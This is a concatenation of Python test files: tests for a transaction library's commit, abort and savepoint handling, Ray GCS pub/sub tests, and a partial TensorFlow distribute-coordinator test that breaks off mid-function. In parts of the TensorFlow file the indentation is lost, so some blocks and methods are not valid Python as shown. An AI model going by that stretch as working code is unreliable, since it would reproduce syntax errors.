        objects = [self._makeDummy('obj', 'a'), self._makeDummy('obj', 'b')]
        mora = self._makeOne(jar)
        mora.objects.extend(objects)
        txn = self._makeDummy('txn', 'c')
        mora.commit(txn)
        self.assertEqual(jar._c, [(objects[0], txn), (objects[1], txn)])
    def test_tpc_vote(self):
        jar = self._makeJar('fff')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_vote(txn)
        self.assertTrue(jar._v)
    def test_tpc_finish(self):
        jar = self._makeJar('ggg')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_finish(txn)
        self.assertTrue(jar._f)
    def test_abort(self):
        # abort() forwards each tracked object to the jar, in order.
        jar = self._makeJar('hhh')
        objects = [self._makeDummy('obj', 'a'), self._makeDummy('obj', 'b')]
        mora = self._makeOne(jar)
        mora.objects.extend(objects)
        txn = self._makeDummy('txn', 'c')
        mora.abort(txn)
        self.assertEqual(jar._a, [(objects[0], txn), (objects[1], txn)])
    def test_abort_w_error(self):
        # An object whose abort raises stops the loop: earlier objects are
        # aborted, the error propagates, later objects are skipped.
        from transaction.tests.common import DummyLogger
        jar = self._makeJar('hhh')
        objects = [self._makeDummy('obj', 'a'),
                   self._makeDummy('obj', 'b'),
                   self._makeDummy('obj', 'c'),
                  ]
        _old_abort = jar.abort
        def _abort(obj, txn):
            if obj._name in ('b', 'c'):
                raise ValueError()
            _old_abort(obj, txn)
        jar.abort = _abort
        mora = self._makeOne(jar)
        mora.objects.extend(objects)
        txn = self._makeDummy('txn', 'c')
        txn.log = log = DummyLogger()
        self.assertRaises(ValueError, mora.abort, txn)
        self.assertEqual(jar._a, [(objects[0], txn)])
    def test_tpc_abort(self):
        jar = self._makeJar('iii')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_abort(txn)
        self.assertTrue(jar._x)
class Test_rm_key(unittest.TestCase):
    """Tests for transaction._transaction.rm_key."""
    def _callFUT(self, resource):
        from transaction._transaction import rm_key
        return rm_key(resource)
    def test_miss(self):
        # A plain object yields no key.
        self.assertIsNone(self._callFUT(object()))
    def test_hit(self):
        self.assertEqual('zzz', self._callFUT(Resource('zzz')))
class Test_object_hint(unittest.TestCase):
    """Tests for transaction._transaction.object_hint."""
    def _callFUT(self, obj):
        from transaction._transaction import object_hint
        return object_hint(obj)
    def test_miss(self):
        # Without a _p_oid attribute the hint reports oid=None.
        class _Test(object):
            pass
        self.assertEqual("_Test oid=None", self._callFUT(_Test()))
    def test_hit(self):
        class _Test(object):
            pass
        instance = _Test()
        instance._p_oid = 'OID'
        self.assertEqual("_Test oid='OID'", self._callFUT(instance))
class Test_oid_repr(unittest.TestCase):
    """Tests for transaction._transaction.oid_repr."""
    def _callFUT(self, oid):
        from transaction._transaction import oid_repr
        return oid_repr(oid)
    def test_as_nonstring(self):
        self.assertEqual('123', self._callFUT(123))
    def test_as_string_not_8_chars(self):
        # Strings that are not exactly 8 characters are simply repr()'d.
        self.assertEqual("'a'", self._callFUT('a'))
    def test_as_string_z64(self):
        # Eight NUL bytes collapse to the short hex form.
        self.assertEqual('0x00', self._callFUT('\0' * 8))
    def test_as_string_all_Fs(self):
        self.assertEqual('0x0101010101010101', self._callFUT('\1' * 8))
    def test_as_string_xxx(self):
        self.assertEqual('0x1010101010101010', self._callFUT('\20' * 8))
class DataManagerAdapterTests(unittest.TestCase):
    """Tests for transaction._transaction.DataManagerAdapter."""
    def _getTargetClass(self):
        from transaction._transaction import DataManagerAdapter
        return DataManagerAdapter
    def _makeOne(self, jar):
        return self._getTargetClass()(jar)
    def _makeJar(self, key):
        # Resource subclass whose prepare() records being called via _p.
        class _Resource(Resource):
            _p = False
            def prepare(self, txn):
                self._p = True
        return _Resource(key)
    def _makeDummy(self, kind, name):
        class _Dummy(object):
            def __init__(self, kind, name):
                self._kind = kind
                self._name = name
            def __repr__(self):
                return '<%s: %s>' % (self._kind, self._name)
        return _Dummy(kind, name)
    def test_ctor(self):
        jar = self._makeJar('aaa')
        dma = self._makeOne(jar)
        self.assertTrue(dma._datamanager is jar)
    def test_commit(self):
        jar = self._makeJar('bbb')
        mora = self._makeOne(jar)
        txn = self._makeDummy('txn', 'c')
        mora.commit(txn)
        self.assertFalse(jar._c) #no-op
    def test_abort(self):
        jar = self._makeJar('ccc')
        mora = self._makeOne(jar)
        txn = self._makeDummy('txn', 'c')
        mora.abort(txn)
        self.assertTrue(jar._a)
    def test_tpc_begin(self):
        jar = self._makeJar('ddd')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_begin(txn)
        self.assertFalse(jar._b) #no-op
    def test_tpc_abort(self):
        # The adapter's tpc_abort must trigger the jar's abort, not finish.
        jar = self._makeJar('eee')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_abort(txn)
        self.assertFalse(jar._f)
        self.assertTrue(jar._a)
    def test_tpc_finish(self):
        # The adapter's tpc_finish must trigger the jar's commit.
        jar = self._makeJar('fff')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_finish(txn)
        self.assertFalse(jar._f)
        self.assertTrue(jar._c)
    def test_tpc_vote(self):
        # The adapter's tpc_vote must trigger the jar's prepare.
        jar = self._makeJar('ggg')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_vote(txn)
        self.assertFalse(jar._v)
        self.assertTrue(jar._p)
    def test_sortKey(self):
        jar = self._makeJar('hhh')
        mora = self._makeOne(jar)
        self.assertEqual(mora.sortKey(), 'hhh')
class SavepointTests(unittest.TestCase):
    """Tests for transaction._transaction.Savepoint."""
    def _getTargetClass(self):
        from transaction._transaction import Savepoint
        return Savepoint
    def _makeOne(self, txn, optimistic, *resources):
        return self._getTargetClass()(txn, optimistic, *resources)
    def test_ctor_w_savepoint_oblivious_resource_non_optimistic(self):
        # A resource without a savepoint() method is rejected unless the
        # savepoint is optimistic.
        txn = object()
        resource = object()
        self.assertRaises(TypeError, self._makeOne, txn, False, resource)
    def test_ctor_w_savepoint_oblivious_resource_optimistic(self):
        # With optimistic=True, oblivious resources get a NoRollbackSavepoint.
        from transaction._transaction import NoRollbackSavepoint
        txn = object()
        resource = object()
        sp = self._makeOne(txn, True, resource)
        self.assertEqual(len(sp._savepoints), 1)
        self.assertTrue(isinstance(sp._savepoints[0], NoRollbackSavepoint))
        self.assertTrue(sp._savepoints[0].datamanager is resource)
    def test_ctor_w_savepoint_aware_resources(self):
        # Resources providing savepoint() contribute their own savepoints.
        class _Aware(object):
            def savepoint(self):
                return self
        txn = object()
        one = _Aware()
        another = _Aware()
        sp = self._makeOne(txn, True, one, another)
        self.assertEqual(len(sp._savepoints), 2)
        self.assertTrue(isinstance(sp._savepoints[0], _Aware))
        self.assertTrue(sp._savepoints[0] is one)
        self.assertTrue(isinstance(sp._savepoints[1], _Aware))
        self.assertTrue(sp._savepoints[1] is another)
    def test_valid_wo_transacction(self):
        # NOTE(review): "transacction" is a typo in the test name (kept for
        # continuity with the test history).
        sp = self._makeOne(None, True, object())
        self.assertFalse(sp.valid)
    def test_valid_w_transacction(self):
        sp = self._makeOne(object(), True, object())
        self.assertTrue(sp.valid)
    def test_rollback_w_txn_None(self):
        # Rolling back a savepoint whose transaction is gone is invalid.
        from transaction.interfaces import InvalidSavepointRollbackError
        txn = None
        class _Aware(object):
            def savepoint(self):
                return self
        resource = _Aware()
        sp = self._makeOne(txn, False, resource)
        self.assertRaises(InvalidSavepointRollbackError, sp.rollback)
    def test_rollback_w_sp_error(self):
        # A failing inner rollback must invalidate the savepoint and
        # re-raise via the transaction's commit-error bookkeeping.
        class _TXN(object):
            _sarce = False
            _raia = None
            def _saveAndRaiseCommitishError(self):
                import sys
                from transaction._compat import reraise
                self._sarce = True
                reraise(*sys.exc_info())
            def _remove_and_invalidate_after(self, sp):
                self._raia = sp
        class _Broken(object):
            def rollback(self):
                raise ValueError()
        _broken = _Broken()
        class _GonnaRaise(object):
            def savepoint(self):
                return _broken
        txn = _TXN()
        resource = _GonnaRaise()
        sp = self._makeOne(txn, False, resource)
        self.assertRaises(ValueError, sp.rollback)
        self.assertTrue(txn._raia is sp)
        self.assertTrue(txn._sarce)
class AbortSavepointTests(unittest.TestCase):
    """Tests for transaction._transaction.AbortSavepoint."""
    def _getTargetClass(self):
        from transaction._transaction import AbortSavepoint
        return AbortSavepoint
    def _makeOne(self, datamanager, transaction):
        return self._getTargetClass()(datamanager, transaction)
    def test_ctor(self):
        dm = object()
        txn = object()
        asp = self._makeOne(dm, txn)
        self.assertTrue(asp.datamanager is dm)
        self.assertTrue(asp.transaction is txn)
    def test_rollback(self):
        # rollback() must abort the datamanager and unjoin it from the txn.
        class _DM(object):
            _aborted = None
            def abort(self, txn):
                self._aborted = txn
        class _TXN(object):
            _unjoined = None
            def _unjoin(self, datamanager):
                # NOTE(review): this rebinds the *instance* attribute
                # '_unjoin', shadowing the method itself; the class-level
                # '_unjoined' default above is never consulted.
                self._unjoin = datamanager
        dm = _DM()
        txn = _TXN()
        asp = self._makeOne(dm, txn)
        asp.rollback()
        self.assertTrue(dm._aborted is txn)
        self.assertTrue(txn._unjoin is dm)
class NoRollbackSavepointTests(unittest.TestCase):
    """Tests for transaction._transaction.NoRollbackSavepoint."""
    def _getTargetClass(self):
        from transaction._transaction import NoRollbackSavepoint
        return NoRollbackSavepoint
    def _makeOne(self, datamanager):
        return self._getTargetClass()(datamanager)
    def test_ctor(self):
        manager = object()
        savepoint = self._makeOne(manager)
        self.assertTrue(savepoint.datamanager is manager)
    def test_rollback(self):
        # A NoRollbackSavepoint always refuses to roll back.
        savepoint = self._makeOne(object())
        self.assertRaises(TypeError, savepoint.rollback)
class MiscellaneousTests(unittest.TestCase):
    """Assorted regression and backward-compatibility tests."""
    def test_BBB_join(self):
        # The join method is provided for "backward-compatability" with ZODB 4
        # data managers.
        from transaction import Transaction
        from transaction.tests.examples import DataManager
        from transaction._transaction import DataManagerAdapter
        # The argument to join must be a zodb4 data manager,
        # transaction.interfaces.IDataManager.
        txn = Transaction()
        dm = DataManager()
        txn.join(dm)
        # The end result is that a data manager adapter is one of the
        # transaction's objects:
        self.assertTrue(isinstance(txn._resources[0], DataManagerAdapter))
        self.assertTrue(txn._resources[0]._datamanager is dm)
    def test_bug239086(self):
        # The original implementation of thread transaction manager made
        # invalid assumptions about thread ids.
        import threading
        import transaction
        import transaction.tests.savepointsample as SPS
        dm = SPS.SampleSavepointDataManager()
        self.assertEqual(list(dm.keys()), [])
        class Sync:
            def __init__(self, label):
                self.label = label
                self.log = []
            def beforeCompletion(self, txn):
                self.log.append('%s %s' % (self.label, 'before'))
            def afterCompletion(self, txn):
                self.log.append('%s %s' % (self.label, 'after'))
            def newTransaction(self, txn):
                self.log.append('%s %s' % (self.label, 'new'))
        def run_in_thread(f):
            # Used as a decorator: run f in a fresh thread and wait for it.
            txn = threading.Thread(target=f)
            txn.start()
            txn.join()
        sync = Sync(1)
        @run_in_thread
        def first():
            transaction.manager.registerSynch(sync)
            transaction.manager.begin()
            dm['a'] = 1
        self.assertEqual(sync.log, ['1 new'])
        @run_in_thread
        def second():
            transaction.abort() # should do nothing.
        self.assertEqual(sync.log, ['1 new'])
        self.assertEqual(list(dm.keys()), ['a'])
        dm = SPS.SampleSavepointDataManager()
        self.assertEqual(list(dm.keys()), [])
        @run_in_thread
        def third():
            dm['a'] = 1
        self.assertEqual(sync.log, ['1 new'])
        transaction.abort() # should do nothing
        self.assertEqual(list(dm.keys()), ['a'])
    def test_gh5(self):
        # Regression test: the traceback buffer must round-trip non-ASCII
        # text (written as unicode, read back in the native encoding).
        from transaction import _transaction
        from transaction._compat import native_
        buffer = _transaction._makeTracebackBuffer()
        s = u'ąčę'
        buffer.write(s)
        buffer.seek(0)
        self.assertEqual(buffer.read(), native_(s, 'utf-8'))
class Resource(object):
    """Scriptable two-phase-commit resource used as a test double.

    Each protocol method records that it ran by flipping its flag
    attribute to True, or raises ValueError when the instance was
    constructed with ``error`` naming that method.
    """
    # Flags recording which protocol methods have run.
    _b = _c = _v = _f = _a = _x = _after = False
    def __init__(self, key, error=None):
        self._key = key
        self._error = error
    def __repr__(self):
        return 'Resource: %s' % self._key
    def sortKey(self):
        return self._key
    def _fail_if(self, stage):
        # Raise when this instance is scripted to fail at *stage*.
        if self._error == stage:
            raise ValueError()
    def tpc_begin(self, txn):
        self._fail_if('tpc_begin')
        self._b = True
    def commit(self, txn):
        self._fail_if('commit')
        self._c = True
    def tpc_vote(self, txn):
        self._fail_if('tpc_vote')
        self._v = True
    def tpc_finish(self, txn):
        self._fail_if('tpc_finish')
        self._f = True
    def abort(self, txn):
        self._fail_if('abort')
        self._a = True
    def tpc_abort(self, txn):
        self._fail_if('tpc_abort')
        self._x = True
    def afterCompletion(self, txn):
        self._fail_if('afterCompletion')
        self._after = True
def test_suite():
    """Build the suite of all test cases in this module.

    Uses ``TestLoader.loadTestsFromTestCase`` instead of the legacy
    ``unittest.makeSuite``, which is deprecated and removed in
    Python 3.13; the collected tests are identical.
    """
    loader = unittest.defaultTestLoader
    return unittest.TestSuite([
        loader.loadTestsFromTestCase(case) for case in (
            TransactionTests,
            MultiObjectResourceAdapterTests,
            Test_rm_key,
            Test_object_hint,
            Test_oid_repr,
            DataManagerAdapterTests,
            SavepointTests,
            AbortSavepointTests,
            NoRollbackSavepointTests,
            MiscellaneousTests,
        )
    ])
if __name__ == '__main__':
    unittest.main()
|
test_gcs_pubsub.py | import sys
import threading
import ray
import ray._private.gcs_utils as gcs_utils
from ray._private.gcs_pubsub import GcsPublisher, GcsErrorSubscriber, \
GcsLogSubscriber, GcsAioPublisher, GcsAioSubscriber
from ray.core.generated.gcs_pb2 import ErrorTableData
import pytest
@pytest.mark.parametrize(
    "ray_start_regular", [{
        "_system_config": {
            "gcs_grpc_based_pubsub": True
        }
    }],
    indirect=True)
def test_publish_and_subscribe_error_info(ray_start_regular):
    """Errors published to GCS are received by a subscriber, in order."""
    address_info = ray_start_regular
    redis = ray._private.services.create_redis_client(
        address_info["redis_address"],
        password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
    gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
    # Subscribe first, then publish.
    subscriber = GcsErrorSubscriber(address=gcs_server_addr)
    subscriber.subscribe()
    publisher = GcsPublisher(address=gcs_server_addr)
    err1 = ErrorTableData(error_message="test error message 1")
    err2 = ErrorTableData(error_message="test error message 2")
    publisher.publish_error(b"aaa_id", err1)
    publisher.publish_error(b"bbb_id", err2)
    # poll() yields (id, error) pairs in publish order.
    assert subscriber.poll() == (b"aaa_id", err1)
    assert subscriber.poll() == (b"bbb_id", err2)
    subscriber.close()
@pytest.mark.asyncio
@pytest.mark.parametrize(
    "ray_start_regular", [{
        "_system_config": {
            "gcs_grpc_based_pubsub": True
        }
    }],
    indirect=True)
async def test_aio_publish_and_subscribe_error_info(ray_start_regular):
    """Async variant: errors published to GCS arrive at the aio subscriber in order."""
    address_info = ray_start_regular
    redis = ray._private.services.create_redis_client(
        address_info["redis_address"],
        password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
    gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
    subscriber = GcsAioSubscriber(address=gcs_server_addr)
    await subscriber.subscribe_error()
    publisher = GcsAioPublisher(address=gcs_server_addr)
    err1 = ErrorTableData(error_message="test error message 1")
    err2 = ErrorTableData(error_message="test error message 2")
    await publisher.publish_error(b"aaa_id", err1)
    await publisher.publish_error(b"bbb_id", err2)
    assert await subscriber.poll_error() == (b"aaa_id", err1)
    assert await subscriber.poll_error() == (b"bbb_id", err2)
    await subscriber.close()
@pytest.mark.parametrize(
    "ray_start_regular", [{
        "_system_config": {
            "gcs_grpc_based_pubsub": True
        }
    }],
    indirect=True)
def test_publish_and_subscribe_logs(ray_start_regular):
    """A published log batch is received intact by a log subscriber."""
    address_info = ray_start_regular
    redis = ray._private.services.create_redis_client(
        address_info["redis_address"],
        password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
    gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
    subscriber = GcsLogSubscriber(address=gcs_server_addr)
    subscriber.subscribe()
    publisher = GcsPublisher(address=gcs_server_addr)
    log_batch = {
        "ip": "127.0.0.1",
        "pid": 1234,
        "job": "0001",
        "is_err": False,
        "lines": ["line 1", "line 2"],
        "actor_name": "test actor",
        "task_name": "test task",
    }
    publisher.publish_logs(log_batch)
    # PID is treated as string.
    log_batch["pid"] = "1234"
    assert subscriber.poll() == log_batch
    subscriber.close()
@pytest.mark.asyncio
@pytest.mark.parametrize(
    "ray_start_regular", [{
        "_system_config": {
            "gcs_grpc_based_pubsub": True
        }
    }],
    indirect=True)
async def test_aio_publish_and_subscribe_logs(ray_start_regular):
    """Async variant: a published log batch round-trips through the aio subscriber."""
    address_info = ray_start_regular
    redis = ray._private.services.create_redis_client(
        address_info["redis_address"],
        password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
    gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
    subscriber = GcsAioSubscriber(address=gcs_server_addr)
    await subscriber.subscribe_logs()
    publisher = GcsAioPublisher(address=gcs_server_addr)
    # "pid" is already a string here, so the batch compares equal unchanged.
    log_batch = {
        "ip": "127.0.0.1",
        "pid": "gcs",
        "job": "0001",
        "is_err": False,
        "lines": ["line 1", "line 2"],
        "actor_name": "test actor",
        "task_name": "test task",
    }
    await publisher.publish_logs(log_batch)
    assert await subscriber.poll_logs() == log_batch
    await subscriber.close()
@pytest.mark.parametrize(
    "ray_start_regular", [{
        "_system_config": {
            "gcs_grpc_based_pubsub": True
        }
    }],
    indirect=True)
def test_subscribe_two_channels(ray_start_regular):
    """Tests concurrently subscribing to two channels work."""
    address_info = ray_start_regular
    redis = ray._private.services.create_redis_client(
        address_info["redis_address"],
        password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
    gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
    num_messages = 100
    errors = []
    # Error-channel consumer, run in its own thread.
    def receive_errors():
        subscriber = GcsErrorSubscriber(address=gcs_server_addr)
        subscriber.subscribe()
        while len(errors) < num_messages:
            _, msg = subscriber.poll()
            errors.append(msg)
    logs = []
    # Log-channel consumer, run in its own thread.
    def receive_logs():
        subscriber = GcsLogSubscriber(address=gcs_server_addr)
        subscriber.subscribe()
        while len(logs) < num_messages:
            log_batch = subscriber.poll()
            logs.append(log_batch)
    t1 = threading.Thread(target=receive_errors)
    t1.start()
    t2 = threading.Thread(target=receive_logs)
    t2.start()
    # Publish interleaved error and log messages while both threads poll.
    publisher = GcsPublisher(address=gcs_server_addr)
    for i in range(0, num_messages):
        publisher.publish_error(
            b"msg_id", ErrorTableData(error_message=f"error {i}"))
        publisher.publish_logs({
            "ip": "127.0.0.1",
            "pid": "gcs",
            "job": "0001",
            "is_err": False,
            "lines": [f"line {i}"],
            "actor_name": "test actor",
            "task_name": "test task",
        })
    t1.join(timeout=10)
    assert not t1.is_alive(), len(errors)
    assert len(errors) == num_messages, len(errors)
    t2.join(timeout=10)
    assert not t2.is_alive(), len(logs)
    assert len(logs) == num_messages, len(logs)
    # Each channel must have received its own messages, in order.
    for i in range(0, num_messages):
        assert errors[i].error_message == f"error {i}"
        assert logs[i]["lines"][0] == f"line {i}"
if __name__ == "__main__":
    # Allow running this file directly; propagate pytest's exit status.
    sys.exit(pytest.main(["-v", __file__]))
|
distribute_coordinator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Distribute Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import json
import os
import sys
import time
import threading
import six
# pylint: disable=invalid-name
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: enable=invalid-name
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.distribute import distribute_coordinator_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
# Short aliases for the task types and coordinator modes under test.
CHIEF = distribute_coordinator._TaskType.CHIEF
WORKER = distribute_coordinator._TaskType.WORKER
PS = distribute_coordinator._TaskType.PS
EVALUATOR = distribute_coordinator._TaskType.EVALUATOR
STANDALONE_CLIENT = distribute_coordinator.CoordinatorMode.STANDALONE_CLIENT
INDEPENDENT_WORKER = distribute_coordinator.CoordinatorMode.INDEPENDENT_WORKER
# Size of the shared in-process cluster created in setUpClass.
NUM_WORKERS = 3
NUM_PS = 2
# Keep a handle on the real sys.exit so tests can patch sys.exit safely.
original_sys_exit = sys.exit
def _bytes_to_str(maybe_bytes):
  """Return `maybe_bytes` as text, decoding UTF-8 bytes when necessary."""
  if isinstance(maybe_bytes, six.string_types):
    return maybe_bytes
  return str(maybe_bytes, "utf-8")
def _strip_protocol(target):
# cluster_spec expects "host:port" strings.
if "//" in target:
return target.split("//")[1]
else:
return target
class MockStrategy(object):
  """Minimal stand-in for a distribution strategy used by the coordinator.

  Only the pieces the coordinator touches are implemented: the
  ``between_graph`` flag, ``configure``, and the ``should_*`` properties.
  """
  def __init__(self,
               between_graph=False,
               should_init=None,
               should_checkpoint=None,
               should_save_summary=None):
    # None for the should_* flags means "decide per task in configure()".
    self._between_graph = between_graph
    self._should_init = should_init
    self._should_checkpoint = should_checkpoint
    self._should_save_summary = should_save_summary
  @property
  def between_graph(self):
    return self._between_graph
  def configure(self,
                session_config=None,
                cluster_spec=None,
                task_type=None,
                task_id=None):
    """Fill in unset should_* flags (True only for task 0) and mutate
    session_config in a recognizable, per-task way so tests can verify
    that configuration actually happened."""
    if self._should_init is None:
      if task_id == 0:
        self._should_init = True
      else:
        self._should_init = False
    if self._should_checkpoint is None:
      if task_id == 0:
        self._should_checkpoint = True
      else:
        self._should_checkpoint = False
    if self._should_save_summary is None:
      if task_id == 0:
        self._should_save_summary = True
      else:
        self._should_save_summary = False
    if session_config:
      if (cluster_spec and task_type and task_id is not None and
          self._between_graph):
        # Between-graph with a full task spec: bump intra-op threads and
        # add per-task device filters.
        session_config.intra_op_parallelism_threads += 1
        if task_type in ["chief", "worker"]:
          session_config.device_filters.extend(
              ["/job:%s/task:%d" % (task_type, task_id), "/job:ps"])
      else:
        # Otherwise: bump inter-op threads and add a marker filter.
        session_config.inter_op_parallelism_threads += 1
        session_config.device_filters.append("/job:somejob")
  @property
  def should_init(self):
    return self._should_init
  @property
  def should_checkpoint(self):
    return self._should_checkpoint
  @property
  def should_save_summary(self):
    return self._should_save_summary
class MockServer(object):
  """Fake in-process server that records whether join() was called."""
  def __init__(self):
    self._join_called = False
  def join(self):
    # Mirrors a real server: join() may only be entered once.
    assert not self._join_called
    self._join_called = True
  @property
  def joined(self):
    return self._join_called
class DistributeCoordinatorTestBase(test.TestCase):
  @classmethod
  def setUpClass(cls):
    """Create one shared in-process cluster and derive its cluster_spec."""
    # We have to create a global in-process cluster because once an in-process
    # tensorflow server is created, there is no way to terminate it. Please see
    # multi_worker_test_base.py for more details.
    cls._workers, cls._ps = test_util.create_local_cluster(
        NUM_WORKERS, num_ps=NUM_PS)
    # cluster_spec maps task type -> list of "host:port" strings.
    cls._cluster_spec = {
        WORKER: [
            _strip_protocol(_bytes_to_str(w.target)) for w in cls._workers
        ],
        PS: [_strip_protocol(_bytes_to_str(ps.target)) for ps in cls._ps]
    }
  def setUp(self):
    """Reset per-test bookkeeping shared across coordinator threads."""
    self._result_correct = 0  # number of workers that saw the expected result
    self._lock = threading.Lock()  # guards updates to shared counters
    self._worker_context = {}
    self._strategy_property = {}
    self._std_servers = {}
    self._barrier = distribute_coordinator._Barrier(NUM_WORKERS)
  @contextlib.contextmanager
  def _test_session(self, target):
    """Yield a Session against *target* with graph optimizations disabled."""
    config = config_pb2.ConfigProto(allow_soft_placement=True)
    # Disable graph optimizations (opt_level -1).
    config.graph_options.optimizer_options.opt_level = -1
    with session.Session(graph=None, config=config, target=target) as sess:
      yield sess
  def _create_cluster_spec(self,
                           has_chief=False,
                           num_workers=1,
                           num_ps=0,
                           has_eval=False):
    """Build a cluster_spec dict with freshly picked localhost ports.

    Re-raises the original portpicker import error if that dependency is
    unavailable.
    """
    if _portpicker_import_error:
      raise _portpicker_import_error  # pylint: disable=raising-bad-type
    cluster_spec = {}
    if has_chief:
      cluster_spec[CHIEF] = ["localhost:%s" % portpicker.pick_unused_port()]
    if num_workers:
      cluster_spec[WORKER] = [
          "localhost:%s" % portpicker.pick_unused_port()
          for _ in range(num_workers)
      ]
    if num_ps:
      cluster_spec[PS] = [
          "localhost:%s" % portpicker.pick_unused_port() for _ in range(num_ps)
      ]
    if has_eval:
      cluster_spec[EVALUATOR] = ["localhost:%s" % portpicker.pick_unused_port()]
    return cluster_spec
  def _in_graph_worker_fn(self, strategy):
    """In-graph worker body: one variable per worker, summed on worker 0.

    Increments ``self._result_correct`` when the computed sum matches the
    expected value.
    """
    context = distribute_coordinator_context.get_current_worker_context()
    self.assertTrue(context is not None)
    with self._test_session(target=context.master_target) as sess:
      xs = []
      expected = 0.0
      for i in range(context.num_workers):
        with ops.device("/job:worker/task:%d" % i):
          # x_i starts at 10 and gets i added: expected contribution i + 10.
          x = variable_scope.get_variable("x_%d" % i, initializer=10.0)
          x_add = x.assign_add(float(i))
          xs.append(x_add)
          expected += i + 10.0
      with ops.device("/job:worker/task:0"):
        result = math_ops.add_n(xs)
      variables.global_variables_initializer().run()
      result_value = sess.run(result)
    self.assertEqual(result_value, expected)
    if result_value == expected:
      self._result_correct += 1
  def _run_coordinator_in_thread(self, worker_fn, strategy, **kwargs):
    """Start run_distribute_coordinator in a thread; return the (started) thread."""
    t = threading.Thread(
        target=distribute_coordinator.run_distribute_coordinator,
        args=(worker_fn, strategy),
        kwargs=kwargs)
    t.start()
    return t
def _run_multiple_coordinator_in_threads(self, worker_fn, strategy,
cluster_spec, **kwargs):
threads = {}
for task_type in cluster_spec.keys():
threads[task_type] = []
for task_id in range(len(cluster_spec[task_type])):
t = self._run_coordinator_in_thread(
worker_fn,
strategy,
cluster_spec=cluster_spec,
task_type=task_type,
task_id=task_id,
**kwargs)
threads[task_type].append(t)
return threads
def _between_graph_worker_fn(self, strategy):
  """Worker fn for between-graph replication.

  Every worker adds 2 to x and subtracts 2 from y (both on ps tasks); with
  NUM_WORKERS == 3 the final values are 16 and 14. Only the chief runs the
  initializer; non-chief workers wait until variables are initialized.
  """
  context = distribute_coordinator_context.get_current_worker_context()
  self.assertTrue(context is not None)
  with self._test_session(target=context.master_target) as sess:
    with ops.device("/job:ps/task:0"):
      # TODO(yuefengz): investigate why not using resource variable will make
      # the test flaky.
      x = variable_scope.get_variable(
          "x", initializer=10.0, use_resource=True)
    with ops.device("/job:ps/task:1"):
      y = variable_scope.get_variable(
          "y", initializer=20.0, use_resource=True)

    x_add = x.assign_add(2.0)
    y_sub = y.assign_sub(2.0)
    train_op = control_flow_ops.group([x_add, y_sub])

    if context.is_chief:
      variables.global_variables_initializer().run()

    # Synchronize workers after initialization.
    if context.has_barrier:
      context.wait_for_other_workers()
    else:
      # No coordinator barrier: poll until all variables report initialized.
      while True:
        uninit_vars = sess.run(variables.report_uninitialized_variables())
        # pylint: disable=g-explicit-length-test
        if len(uninit_vars) == 0:
          break

    sess.run(train_op)

    # Synchronize workers after one step to make sure they all have finished
    # training.
    if context.has_barrier:
      context.wait_for_other_workers()
    else:
      self._barrier.wait()

    x_val, y_val = sess.run([x, y])
    self.assertEqual(x_val, 16.0)
    self.assertEqual(y_val, 14.0)
    if x_val == 16.0 and y_val == 14.0:
      # Guarded by a lock because every worker thread increments this.
      with self._lock:
        self._result_correct += 1
def _between_graph_with_monitored_session(self, strategy):
  """Same as `_between_graph_worker_fn` but lets MonitoredSession do init.

  MonitoredSession runs the init/ready ops itself, so no explicit chief-side
  initialization or init barrier is needed here.
  """
  context = distribute_coordinator_context.get_current_worker_context()
  self.assertTrue(context is not None)
  with ops.device("/job:ps/task:0"):
    # TODO(yuefengz): investigate why not using resource variable will make
    # the test flaky.
    x = variable_scope.get_variable("x", initializer=10.0, use_resource=True)
  with ops.device("/job:ps/task:1"):
    y = variable_scope.get_variable("y", initializer=20.0, use_resource=True)

  x_add = x.assign_add(2.0)
  y_sub = y.assign_sub(2.0)
  train_op = control_flow_ops.group([x_add, y_sub])

  # The monitored session will run init or ready ops.
  with monitored_session.MonitoredSession() as sess:
    sess.run(train_op)

    # Synchronize workers after one step to make sure they all have finished
    # training.
    if context.has_barrier:
      context.wait_for_other_workers()
    else:
      self._barrier.wait()

    x_val, y_val = sess.run([x, y])

  self.assertEqual(x_val, 16.0)
  self.assertEqual(y_val, 14.0)
  if x_val == 16.0 and y_val == 14.0:
    # Guarded by a lock because every worker thread increments this.
    with self._lock:
      self._result_correct += 1
def _dump_worker_context(self, strategy):
  """Dumps the properties of each worker context.

  It dumps the context properties to a dict mapping from task_type to a list
  of tuples of master_target, num_workers, is_chief and distribute_mode, where
  the list is indexed by the task_id.

  Args:
    strategy: a `DistributionStrategy` object.
  """
  context = distribute_coordinator_context.get_current_worker_context()
  self.assertTrue(context is not None)
  task_type = str(context.task_type)
  task_id = context.task_id or 0
  with self._lock:
